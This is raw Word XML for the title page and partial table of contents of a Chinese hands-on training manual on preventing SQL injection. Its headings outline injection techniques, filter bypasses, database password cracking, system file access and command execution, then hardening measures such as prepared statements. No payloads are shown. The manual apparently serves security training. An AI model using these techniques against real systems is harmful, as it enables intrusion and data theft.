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C3315" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="059C3316" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="059C3317" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="059C3318" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="059C3319" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="059C331A" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
        <w:t>Web安全主题</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059C331B" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
        <w:t>SQL注入攻击防范</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059C331C" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
        <w:t>实操手册</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059C331D" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="059C331E" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="059C331F" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="059C3320" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="059C3321" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000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2022</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>年</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>月</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>日</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059C3322" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:id w:val="147473336"/>
        <w15:color w:val="DBDBDB"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtContent>
        <w:p w14:paraId="059C3323" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
          <w:pPr>
            <w:jc w:val="center"/>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
            </w:rPr>
            <w:t>目录</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="059C3324" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC1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hyperlink w:anchor="_Toc22042" w:history="1">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>一、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手动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注入练习</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText xml:space="preserve"> PAGEREF _Toc22042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059C3325" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8306"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc18689" w:history="1">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>单引号报错注入</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText xml:space="preserve"> PAGEREF _Toc18689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059C3326" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8306"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc31363" w:history="1">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>基于报错回显</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText xml:space="preserve"> PAGEREF _Toc31363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059C3327" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8306"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc4039" w:history="1">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>“万能密码”登录</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText xml:space="preserve"> PAGEREF _Toc4039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059C3328" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8306"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc14671" w:history="1">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>基于布尔的盲注</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText xml:space="preserve"> PAGEREF _Toc14671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059C3329" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8306"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc3248" w:history="1">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>基于时间的盲注</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText xml:space="preserve"> PAGEREF _Toc3248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059C332A" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8306"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc16082" w:history="1">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>基于</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>dnslog</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>的盲注</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText xml:space="preserve"> PAGEREF _Toc16082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059C332B" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8306"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc3855" w:history="1">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>联合查询注入</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText xml:space="preserve"> PAGEREF _Toc3855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059C332C" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8306"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc26652" w:history="1">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>堆叠查询注入</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText xml:space="preserve"> PAGEREF _Toc26652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059C332D" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8306"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc18070" w:history="1">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>绕过注释过滤注入</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText xml:space="preserve"> PAGEREF _Toc18070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14:paraId="059C332E" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8306"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc22901" w:history="1">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>绕过逻辑运算过滤注入</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText xml:space="preserve"> PAGEREF _Toc22901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14:paraId="059C332F" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8306"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc5218" w:history="1">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>绕过空格过滤注入</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText xml:space="preserve"> PAGEREF _Toc5218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14:paraId="059C3330" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8306"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc19885" w:history="1">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>绕过</w:t>
            </w:r>
            <w:r>
              <w:t>union</w:t>
            </w:r>
            <w:r>
              <w:t>和</w:t>
            </w:r>
            <w:r>
              <w:t>select</w:t>
            </w:r>
            <w:r>
              <w:t>过滤</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>注入</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText xml:space="preserve"> PAGEREF _Toc19885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14:paraId="059C3331" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8306"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc21889" w:history="1">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>二、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工具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注入练习</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText xml:space="preserve"> PAGEREF _Toc21889 \h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14:paraId="059C3332" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8306"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc3351" w:history="1">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>检测是否存在注入</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText xml:space="preserve"> PAGEREF _Toc3351 \h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14:paraId="059C3333" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8306"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc31377" w:history="1">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>指定注入点、</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>DBMS</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>进行检测</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText xml:space="preserve"> PAGEREF _Toc31377 \h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14:paraId="059C3334" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8306"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12577" w:history="1">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>从日志文件发起检测</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText xml:space="preserve"> PAGEREF _Toc12577 \h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14:paraId="059C3335" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8306"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc7527" w:history="1">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>获取数据库名、数据库表、数据库字段</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText xml:space="preserve"> PAGEREF _Toc7527 \h </w:instrText>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:t>12</w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="059C3336" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8306"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc16871" w:history="1">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>获取数据库中的数据</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText xml:space="preserve"> PAGEREF _Toc16871 \h </w:instrText>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:t>12</w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="059C3337" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8306"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc3296" w:history="1">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>运行自定义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语句</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText xml:space="preserve"> PAGEREF _Toc3296 \h </w:instrText>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:t>13</w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="059C3338" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8306"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc25915" w:history="1">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>获取数据库所有用户</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText xml:space="preserve"> PAGEREF _Toc25915 \h </w:instrText>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:t>14</w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="059C3339" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8306"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc18506" w:history="1">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>获取并破解数据库密码</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText xml:space="preserve"> PAGEREF _Toc18506 \h </w:instrText>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:t>14</w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="059C333A" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8306"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc21228" w:history="1">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>读取系统文件</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText xml:space="preserve"> PAGEREF _Toc21228 \h </w:instrText>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:t>15</w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="059C333B" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8306"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc28425" w:history="1">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>写入系统文件</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText xml:space="preserve"> PAGEREF _Toc28425 \h </w:instrText>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:t>15</w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="059C333C" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8306"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc8282" w:history="1">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>执行系统命令</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText xml:space="preserve"> PAGEREF _Toc8282 \h </w:instrText>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:t>16</w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="059C333D" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8306"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc3678" w:history="1">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>三、</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> SQL</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>加固练习</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText xml:space="preserve"> PAGEREF _Toc3678 \h </w:instrText>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:t>17</w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="059C333E" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8306"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc17816" w:history="1">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>关键词过滤</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText xml:space="preserve"> PAGEREF _Toc17816 \h </w:instrText>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:t>17</w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="059C333F" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8306"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc18051" w:history="1">
            <w:r>
              <w:t>参数校验</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText xml:space="preserve"> PAGEREF _Toc18051 \h </w:instrText>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:t>17</w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="059C3340" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8306"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc4267" w:history="1">
            <w:r>
              <w:t>预编译查询</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
